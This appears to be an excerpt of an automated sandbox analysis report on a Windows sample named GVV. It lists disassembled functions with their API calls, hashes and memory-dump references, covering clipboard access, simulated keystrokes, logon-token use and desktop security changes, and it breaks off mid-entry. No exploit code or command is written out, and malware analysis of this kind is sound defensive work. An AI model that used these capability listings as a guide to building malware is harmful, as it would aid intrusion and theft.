                • Opcode ID: a1b95f598c7364278b8141a6b9a13bbd071e996375794fc85470ab62a862a464
                • Instruction ID: 03aa2a13158bc1686de1aeabdebaf1171c37ac8c75c27242887978a5008e4e95
                • Opcode Fuzzy Hash: a1b95f598c7364278b8141a6b9a13bbd071e996375794fc85470ab62a862a464
                • Instruction Fuzzy Hash: AEC09B35380345AFF21447C0BD9AF547754B749B10F444001F6095DDE3C7B11890D690
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00115745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0011949C,?,00008000), ref: 00115773
                • GetLastError.KERNEL32(00000002,00000000), ref: 001876DE
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CreateErrorFileLast
                • String ID:
                • API String ID: 1214770103-0
                • Opcode ID: 17aaf11ebb92041ca2c8c36ab2bfea56b5f34e7f10a6a3517bae84cc511ccff5
                • Instruction ID: 04e44f70e948a1d5ff73da9eae89dc3a2c0d82bd554d1ecec534f6939d3076bf
                • Opcode Fuzzy Hash: 17aaf11ebb92041ca2c8c36ab2bfea56b5f34e7f10a6a3517bae84cc511ccff5
                • Instruction Fuzzy Hash: 8B8170306087019FC719EF28C491AA9B7E1BF99354F14452DF89A5B2D2DB30EE85CF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction ID: 26e05ed500aff2274c7e51aebc9716c5847117e030fb6a3eac68b9295f4f00e9
                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction Fuzzy Hash: D6310374A001199BD718CF59E490969F7B1FB49310F2482B9E809CB652E731EDE2DBC0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A8232C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(000001F4), ref: 01A82341
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                • Instruction ID: e93cfd4256447d849a551c317c05d685a6ad241ce61815b339af123e823307a9
                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                • Instruction Fuzzy Hash: 12E09A7594010DAFDB00EFA4D6496AE7BB4EF04301F1005A1FD0596681DA309A548A62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01A82330 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(000001F4), ref: 01A82341
                Memory Dump Source
                • Source File: 00000000.00000002.3890372011.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a80000_GVV.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction ID: 8efc4b1299cd4a55515ca9f8499588039c35e69d0e51e5e3b9192f348032651b
                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction Fuzzy Hash: 8BE0E67594010DDFDB00EFB4D64D6AE7FB4EF04301F100561FD05D2281D6309D50CA62
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 001A9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001A961A
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001A965B
                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001A969F
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001A96C9
                • SendMessageW.USER32 ref: 001A96F2
                • GetKeyState.USER32(00000011), ref: 001A978B
                • GetKeyState.USER32(00000009), ref: 001A9798
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001A97AE
                • GetKeyState.USER32(00000010), ref: 001A97B8
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001A97E9
                • SendMessageW.USER32 ref: 001A9810
                • SendMessageW.USER32(?,00001030,?,001A7E95), ref: 001A9918
                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001A992E
                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001A9941
                • SetCapture.USER32(?), ref: 001A994A
                • ClientToScreen.USER32(?,?), ref: 001A99AF
                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001A99BC
                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001A99D6
                • ReleaseCapture.USER32 ref: 001A99E1
                • GetCursorPos.USER32(?), ref: 001A9A19
                • ScreenToClient.USER32(?,?), ref: 001A9A26
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001A9A80
                • SendMessageW.USER32 ref: 001A9AAE
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001A9AEB
                • SendMessageW.USER32 ref: 001A9B1A
                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001A9B3B
                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001A9B4A
                • GetCursorPos.USER32(?), ref: 001A9B68
                • ScreenToClient.USER32(?,?), ref: 001A9B75
                • GetParent.USER32(?), ref: 001A9B93
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001A9BFA
                • SendMessageW.USER32 ref: 001A9C2B
                • ClientToScreen.USER32(?,?), ref: 001A9C84
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001A9CB4
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001A9CDE
                • SendMessageW.USER32 ref: 001A9D01
                • ClientToScreen.USER32(?,?), ref: 001A9D4E
                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001A9D82
                  • Part of subcall function 00129944: GetWindowLongW.USER32(?,000000EB), ref: 00129952
                • GetWindowLongW.USER32(?,000000F0), ref: 001A9E05
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                • String ID: @GUI_DRAGID$F
                • API String ID: 3429851547-4164748364
                • Opcode ID: 133a92ab2ab76035b85650e1f2d061b740a8102edb4102caac44719461bdec6c
                • Instruction ID: a90b7793011989b9c78dac118a9c5ab5958644f5b6262bfb5c75a2e7e0ca6e71
                • Opcode Fuzzy Hash: 133a92ab2ab76035b85650e1f2d061b740a8102edb4102caac44719461bdec6c
                • Instruction Fuzzy Hash: E242AE78604341AFDB25CF64CC84EAABBE5FF4A314F140619F699876A1D731E890CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001A48F3
                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001A4908
                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001A4927
                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001A494B
                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001A495C
                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001A497B
                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001A49AE
                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001A49D4
                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001A4A0F
                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001A4A56
                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001A4A7E
                • IsMenu.USER32(?), ref: 001A4A97
                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001A4AF2
                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001A4B20
                • GetWindowLongW.USER32(?,000000F0), ref: 001A4B94
                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001A4BE3
                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001A4C82
                • wsprintfW.USER32 ref: 001A4CAE
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001A4CC9
                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001A4CF1
                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001A4D13
                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001A4D33
                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001A4D5A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                • String ID: %d/%02d/%02d
                • API String ID: 4054740463-328681919
                • Opcode ID: ea148e3b11686e6bca1afcf6bd6a1fc91cbc5a30eb44961d8385c84be7f294ae
                • Instruction ID: f0f60805823df307498c11c7764d861864a017b8eabd9da6d31abffe3fe3bd31
                • Opcode Fuzzy Hash: ea148e3b11686e6bca1afcf6bd6a1fc91cbc5a30eb44961d8385c84be7f294ae
                • Instruction Fuzzy Hash: 3C12D175600214AFEB258F68DC49FEE7BF8AF86710F104129F51AEB2D1DBB49941CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0012F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                Download Yara Rule
                APIs
                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0012F998
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016F474
                • IsIconic.USER32(00000000), ref: 0016F47D
                • ShowWindow.USER32(00000000,00000009), ref: 0016F48A
                • SetForegroundWindow.USER32(00000000), ref: 0016F494
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0016F4AA
                • GetCurrentThreadId.KERNEL32 ref: 0016F4B1
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0016F4BD
                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0016F4CE
                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0016F4D6
                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0016F4DE
                • SetForegroundWindow.USER32(00000000), ref: 0016F4E1
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F4F6
                • keybd_event.USER32(00000012,00000000), ref: 0016F501
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F50B
                • keybd_event.USER32(00000012,00000000), ref: 0016F510
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F519
                • keybd_event.USER32(00000012,00000000), ref: 0016F51E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0016F528
                • keybd_event.USER32(00000012,00000000), ref: 0016F52D
                • SetForegroundWindow.USER32(00000000), ref: 0016F530
                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0016F557
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 4125248594-2988720461
                • Opcode ID: 48ef190a2d6d736da7d71690f2d9765e8e9cdbcd82e40f62b12a5933a6f04778
                • Instruction ID: 21bc4848eb14780be26d53a2e90012c6148f41418934fb0f506b7344c52e84b5
                • Opcode Fuzzy Hash: 48ef190a2d6d736da7d71690f2d9765e8e9cdbcd82e40f62b12a5933a6f04778
                • Instruction Fuzzy Hash: C2318271B40218BFEB206BB55C4AFBF7E6CEB45B50F10002AFA05E61D1CBB05D51AEA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00171201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 001716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0017170D
                  • Part of subcall function 001716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0017173A
                  • Part of subcall function 001716C3: GetLastError.KERNEL32 ref: 0017174A
                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00171286
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001712A8
                • CloseHandle.KERNEL32(?), ref: 001712B9
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001712D1
                • GetProcessWindowStation.USER32 ref: 001712EA
                • SetProcessWindowStation.USER32(00000000), ref: 001712F4
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00171310
                  • Part of subcall function 001710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001711FC), ref: 001710D4
                  • Part of subcall function 001710BF: CloseHandle.KERNEL32(?,?,001711FC), ref: 001710E9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                • String ID: $default$winsta0
                • API String ID: 22674027-1027155976
                • Opcode ID: d81ea633cab4c8993e84d1a9c8d113897c4f618415dc5335576ad949a6d4afbf
                • Instruction ID: 20a32dfcbb22768e7f034e5d47aedfd2ebc40cdafadbac4462ee6385e9d0ab90
                • Opcode Fuzzy Hash: d81ea633cab4c8993e84d1a9c8d113897c4f618415dc5335576ad949a6d4afbf
                • Instruction Fuzzy Hash: EF819D71900209BFDF219FA8DC49FEE7BB9FF09704F148129F919A62A0D7719984CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00170B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00171114
                  • Part of subcall function 001710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171120
                  • Part of subcall function 001710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 0017112F
                  • Part of subcall function 001710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171136
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0017114D
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00170BCC
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00170C00
                • GetLengthSid.ADVAPI32(?), ref: 00170C17
                • GetAce.ADVAPI32(?,00000000,?), ref: 00170C51
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00170C6D
                • GetLengthSid.ADVAPI32(?), ref: 00170C84
                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00170C8C
                • HeapAlloc.KERNEL32(00000000), ref: 00170C93
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00170CB4
                • CopySid.ADVAPI32(00000000), ref: 00170CBB
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00170CEA
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00170D0C
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00170D1E
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170D45
                • HeapFree.KERNEL32(00000000), ref: 00170D4C
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170D55
                • HeapFree.KERNEL32(00000000), ref: 00170D5C
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170D65
                • HeapFree.KERNEL32(00000000), ref: 00170D6C
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00170D78
                • HeapFree.KERNEL32(00000000), ref: 00170D7F
                  • Part of subcall function 00171193: GetProcessHeap.KERNEL32(00000008,00170BB1,?,00000000,?,00170BB1,?), ref: 001711A1
                  • Part of subcall function 00171193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00170BB1,?), ref: 001711A8
                  • Part of subcall function 00171193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00170BB1,?), ref: 001711B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 4175595110-0
                • Opcode ID: cdde17eda09e0baf1e9322ff304336f9b843bd329447da01f8cb586f731b259c
                • Instruction ID: 6d98ad746a487877f5e7cad33ba4de69dd68df015b833fd9283044c1718b287a
                • Opcode Fuzzy Hash: cdde17eda09e0baf1e9322ff304336f9b843bd329447da01f8cb586f731b259c
                • Instruction Fuzzy Hash: D2717D75A0030AEBDF11DFE4DC44FAEBBB8BF09310F148515F918A6291D771AA45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                Download Yara Rule
                APIs
                • OpenClipboard.USER32(001ACC08), ref: 0018EB29
                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0018EB37
                • GetClipboardData.USER32(0000000D), ref: 0018EB43
                • CloseClipboard.USER32 ref: 0018EB4F
                • GlobalLock.KERNEL32(00000000), ref: 0018EB87
                • CloseClipboard.USER32 ref: 0018EB91
                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0018EBBC
                • IsClipboardFormatAvailable.USER32(00000001), ref: 0018EBC9
                • GetClipboardData.USER32(00000001), ref: 0018EBD1
                • GlobalLock.KERNEL32(00000000), ref: 0018EBE2
                • GlobalUnlock.KERNEL32(00000000,?), ref: 0018EC22
                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0018EC38
                • GetClipboardData.USER32(0000000F), ref: 0018EC44
                • GlobalLock.KERNEL32(00000000), ref: 0018EC55
                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0018EC77
                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0018EC94
                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0018ECD2
                • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0018ECF3
                • CountClipboardFormats.USER32 ref: 0018ED14
                • CloseClipboard.USER32 ref: 0018ED59
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                • String ID:
                • API String ID: 420908878-0
                • Opcode ID: 58b575d8e75e97c6503e91a6f467e52b167be090f72076c72df81e2b8744b3f5
                • Instruction ID: 1e07a06347a448176c2453f4e0715005be908a177749e756bea82d96316b09b6
                • Opcode Fuzzy Hash: 58b575d8e75e97c6503e91a6f467e52b167be090f72076c72df81e2b8744b3f5
                • Instruction Fuzzy Hash: 8861E2742043019FD304EF64D894F6ABBE4AF95714F04451DF456972A2DB31EE89CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0018698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 001869BE
                • FindClose.KERNEL32(00000000), ref: 00186A12
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00186A4E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00186A75
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00186AB2
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00186ADF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                • API String ID: 3830820486-3289030164
                • Opcode ID: 674e4d6479db7568c7db4e048b22297fedbf6a25014df2c637d455938bed1290
                • Instruction ID: 860757b2c9438159f80cc2be90d92d6d0a2108860df58ade0bfcf079eede4843
                • Opcode Fuzzy Hash: 674e4d6479db7568c7db4e048b22297fedbf6a25014df2c637d455938bed1290
                • Instruction Fuzzy Hash: 14D15072508300AFC314EBA4D891EABB7FCAF98704F04492DF595D7291EB74DA45CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00189642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00189663
                • GetFileAttributesW.KERNEL32(?), ref: 001896A1
                • SetFileAttributesW.KERNEL32(?,?), ref: 001896BB
                • FindNextFileW.KERNEL32(00000000,?), ref: 001896D3
                • FindClose.KERNEL32(00000000), ref: 001896DE
                • FindFirstFileW.KERNEL32(*.*,?), ref: 001896FA
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0018974A
                • SetCurrentDirectoryW.KERNEL32(001D6B7C), ref: 00189768
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00189772
                • FindClose.KERNEL32(00000000), ref: 0018977F
                • FindClose.KERNEL32(00000000), ref: 0018978F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: d7de3fb32d8600918ca75445c70637e104f9c888270ede788a44752b21acb726
                • Instruction ID: a4637fc1c21c7eca59beba0b2a60a4c9595e5db1f02c179cf444383f2b2e6c8c
